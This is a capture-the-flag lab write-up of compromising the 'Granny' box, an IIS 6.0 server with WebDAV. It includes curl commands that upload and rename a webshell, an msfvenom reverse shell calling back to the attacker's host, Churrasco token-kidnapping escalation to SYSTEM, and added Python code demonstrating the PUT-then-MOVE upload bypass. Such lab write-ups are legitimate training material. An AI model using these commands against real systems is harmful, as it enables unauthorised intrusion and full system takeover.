Granny

Overview
Initial Foothold : Microsoft IIS 6.0 Exploitation
Privilege Escalation : SeImpersonatePrivilege abuse with Churrasco.exe (token kidnapping)
Enumeration
Starting with a full nmap port scan of the target.
Port Scanning
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Thu, 25 Jun 2020 16:49:55 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ WebDAV type: Unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (90%), Microsoft Windows Server 2003 SP2 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows 2000 SP4 (85%)
From the full nmap scan we see that only port 80 is open, running Microsoft IIS 6.0 with WebDAV enabled (see the http-webdav-scan output), and the OS guess points at Windows Server 2003.
The PUT method is advertised in the server's Public options (it is missing from the Allowed list returned for the root path, so it still needs to be tested), which would let us write files onto the webserver.
Test this with davtest, which PUTs small test files of several extensions and then checks whether each one is served or executed.

The davtest result confirms that we can PUT files on the server.
Confirm it by requesting (executing) one of the uploaded test files.

There is also a public exploit for IIS 6.0 itself, which we will use from GitHub below.

Summary
Files can be uploaded to the webserver through WebDAV (PUT is permitted)
A public exploit exists for this vulnerable IIS 6.0 webserver
Exploitation
Using the IIS 6.0 exploit
Use the exploit from GitHub to exploit this vulnerability.
Launch a listener on port 4444.

Execute the exploit


The exploit completed successfully and we got a shell.
Using PUT method
Using curl we will PUT a webshell on the server.
A direct PUT of an .aspx file is refused, so first upload the webshell with a .txt extension and then rename it to .aspx with the MOVE method, which the server also allows.
First PUT a copy of cmdasp.aspx (it ships with Kali under /usr/share/webshells/aspx/) saved as cmdasp.txt, using curl. Because the URL ends in a slash, curl appends the local file name to it:
kali@kali:~/htb/10.10.10.15$ curl http://10.10.10.15/ --upload-file cmdasp.txt

Now use curl again to MOVE cmdasp.txt to cmdasp.aspx; the new name goes in the Destination header:
curl -X MOVE --header "Destination:http://10.10.10.15/cmdasp.aspx" http://10.10.10.15/cmdasp.txt

Browsing to cmdasp.aspx gives command execution through the webshell.
Let's upgrade this to a reverse shell.
First generate a reverse shell payload with msfvenom (it will call back to port 4445, so a separate listener is needed there):
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4445 -f exe > shell.exe
Then upload it with the same PUT-and-MOVE method (the binary is staged as shell.txt), start a listener on port 4445 and run shell.exe from the webshell:
kali@kali:~/htb/10.10.10.15$ curl http://10.10.10.15/ --upload-file shell.txt
kali@kali:~/htb/10.10.10.15$ curl -X MOVE --header "Destination:http://10.10.10.15/shell.exe" http://10.10.10.15/shell.txt


The reverse shell connects back to the listener.
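The WebDAV behaviour used in both the enumeration step (PUT is permitted) and the curl upload above, as an added example that is not part of the original writeup: a Python client that issues the same PUT and MOVE requests as the curl commands, run against a small mock WebDAV handler that stands in for the target. The mock's policy (refuse a direct PUT of .aspx/.asp/.exe, but never re-check the name on MOVE) is an assumption chosen to reproduce what the writeup observed; it is not IIS, and the host, port, file names and payload bytes are constructed for the demo.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Mock policy standing in for the target's behaviour: a direct PUT of these
# extensions is refused, but nothing re-checks the name on MOVE.
BLOCKED_PUT_EXTENSIONS = (".aspx", ".asp", ".exe")


class MockDavHandler(BaseHTTPRequestHandler):
    """Tiny WebDAV-like handler: PUT stores bytes, MOVE renames, GET serves.
    Constructed for this demo; it is not IIS and not the target."""
    files = {}                 # path -> bytes, shared by all requests
    lock = threading.Lock()

    def log_message(self, *args):
        pass                   # keep the demo quiet

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.path.lower().endswith(BLOCKED_PUT_EXTENSIONS):
            self.send_response(403)      # the "can't PUT .aspx directly" case
        else:
            with self.lock:
                self.files[self.path] = body
            self.send_response(201)      # Created
        self.end_headers()

    def do_MOVE(self):
        # RFC 4918: Destination carries an absolute URI; only its path matters here.
        dest = urlparse(self.headers.get("Destination", "")).path
        with self.lock:
            if self.path in self.files and dest:
                self.files[dest] = self.files.pop(self.path)   # no extension check
                self.send_response(201)
            else:
                self.send_response(404)
        self.end_headers()

    def do_GET(self):
        with self.lock:
            body = self.files.get(self.path)
        if body is None:
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_mock_server():
    """Serve the mock on an ephemeral loopback port in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), MockDavHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def _request(host, port, method, path, body=None, headers=None):
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    result = (resp.status, resp.read())
    conn.close()
    return result


def dav_put(host, port, path, data):
    """Same request as `curl http://host/path --upload-file local`."""
    return _request(host, port, "PUT", path, body=data)[0]


def dav_move(host, port, src, dest):
    """Same request as `curl -X MOVE --header "Destination:http://host/dest" http://host/src`."""
    destination = "http://%s:%d%s" % (host, port, dest)
    return _request(host, port, "MOVE", src, headers={"Destination": destination})[0]


def upload_via_move(host, port, payload, staging, final):
    """The writeup's trick: PUT under a harmless extension, then MOVE to the
    real name.  Returns (put_status, move_status)."""
    return dav_put(host, port, staging, payload), dav_move(host, port, staging, final)


def demo():
    """Run the whole exchange against the mock and report each status."""
    server, port = start_mock_server()
    try:
        payload = b'<%@ Page Language="C#" %>'    # constructed stand-in for cmdasp.aspx
        direct = dav_put("127.0.0.1", port, "/cmdasp.aspx", payload)
        put, move = upload_via_move("127.0.0.1", port, payload, "/cmdasp.txt", "/cmdasp.aspx")
        status, body = _request("127.0.0.1", port, "GET", "/cmdasp.aspx")
        return {"direct_put": direct, "staged_put": put, "move": move,
                "get": status, "served_payload": body == payload}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())    # {'direct_put': 403, 'staged_put': 201, 'move': 201, 'get': 200, 'served_payload': True}
```

Against a real target, point dav_put and dav_move at its host and port and check the status codes the same way: a 403 on the direct PUT followed by 201 on the staged PUT and on the MOVE is the pattern that says the extension filter only applies to PUT.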
Privilege Escalation
After getting a shell as a service account, always check which token privileges that account holds.

In this case SeImpersonatePrivilege was enabled, which on Windows Server 2003 can be abused (token kidnapping) to obtain a SYSTEM shell.
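A small triage helper for the privilege check described above, added here as an example and not taken from the original writeup: it parses the table that `whoami /priv` prints and reports which held privileges are known local-escalation primitives, distinguishing ones that are already enabled from ones the token merely holds in the Disabled state (a process can re-enable those itself, so they still matter). The sample output is constructed to resemble a Server 2003 service-account token; the watch list is the editor's, not something the target printed.

```python
# Privileges that commonly lead to SYSTEM when a service account holds them:
# SeImpersonate / SeAssignPrimaryToken via token kidnapping (Churrasco on
# Server 2003, the potato family later), the rest via their own well-known abuses.
ESCALATION_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
    "SeTcbPrivilege",
    "SeCreateTokenPrivilege",
}

# Constructed sample of `whoami /priv` output for a service-account token.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeAuditPrivilege              Generate security audits                  Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.
    Rows start after the '====' separator line; the name is the first
    column and the state the last, with a free-text description between."""
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("Se"):
            privs[parts[0]] = parts[-1]
    return privs


def escalation_candidates(text):
    """Split the watch-listed privileges in the output into those already
    Enabled and those merely held (Disabled); both are worth noting because a
    Disabled privilege is still in the token and can be enabled by the process."""
    privs = parse_whoami_priv(text)
    enabled = sorted(p for p, s in privs.items()
                     if p in ESCALATION_PRIVILEGES and s == "Enabled")
    held = sorted(p for p, s in privs.items()
                  if p in ESCALATION_PRIVILEGES and s != "Enabled")
    return {"enabled": enabled, "disabled_but_held": held}


if __name__ == "__main__":
    print(escalation_candidates(SAMPLE_WHOAMI_PRIV))
```

On the box, paste the real `whoami /priv` output in place of the sample; an Enabled SeImpersonatePrivilege is what points at the token-kidnapping route used in the next step.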
Let's use the Churrasco.exe exploit from the GitHub repo below.
Transfer this binary, along with the reverse shell binary, to the target host using FTP.
Several other transfer methods were tried first; FTP was the one that successfully uploaded the exploit.
Create a text file on the Windows target containing the ftp commands:

Now run ftp with that file as its command script:

This downloads the required files onto the target host. Then run Churrasco with the reverse shell binary as the command it should execute as SYSTEM:
C:\WINDOWS\Temp>churrasco.exe -d c:\windows\temp\shell.exe


The listener receives a SYSTEM shell.

That's all for this box.
Good Bye :)